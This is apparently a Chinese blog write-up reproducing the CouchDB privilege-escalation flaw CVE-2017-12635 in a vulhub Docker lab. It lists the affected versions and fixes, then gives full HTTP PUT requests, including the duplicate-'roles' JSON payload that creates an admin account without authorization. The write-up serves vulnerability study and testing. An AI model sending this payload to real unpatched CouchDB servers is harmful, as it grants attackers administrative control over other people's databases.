Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
1.漏洞介绍
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。
在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。
2.影响版本:
小于 1.7.0 以及 小于 2.1.1
3.修复建议
所有用户都应升级到CouchDB 1.7.1或 2.1.1。
配置HTTP API配置参数,针对敏感配置信息加入黑名单。
环境搭建
本次复现是使用kali搭建vulhub靶机。攻击机为kali2机
cd vulhub-master/couchdb/CVE-2017-12635
docker-compose up -d
环境启动后,访问http://your-ip:5984/_utils/ 就可以看到一个登录页面,这是couchdb登录页面靶机成功启动,但是我们没有密码,无法登录
4.漏洞复现
首先,使用burpsuit抓包,并发送如下数据,验证漏洞
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"password": "vulhub"
}
发送数据过去,org.couchdb,user:name 与name:name 与name:name 与name:name是对应的,此时我们没有admin权限,所以会报错forbidden。403错误:{"error":"forbidden","reason":"Only _admin may set roles"},只有管理员才能设置Role角色:
然后到了真正利用漏洞了,发送包含两个roles的数据包,就可以利用Erlang和JavaScript对JSON解析方式的不同的原因,绕过限制。利用漏洞,数据包如下:
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"password": "vulhub"
}成功创建管理员用户,账号密码都为vulhub,成功登录页面:
再次访问登录页面:http://your-ip:5984/_utils/ 输入账号密码vulhub
后面我再试了一下创建其他账号和修改vulhub账号的密码,均报错。
所以在vulhub里面这个漏洞应该只能创建一个账号,且无法修改密码。
参考链接:
https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12635/README.zh-cn.md
https://my.oschina.net/u/4327596/blog/3425909
声明:
本文仅限于大家技术交流和学习,严禁读者利用本博客的所有知识点进行非法操作。如果你利用文章中介绍的技术对他人造成损失,后果由您自行承担,感谢您的配合,
作者创作不容易,请大家点赞收藏支持一下。谢谢各位读者大老爷。
3262
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
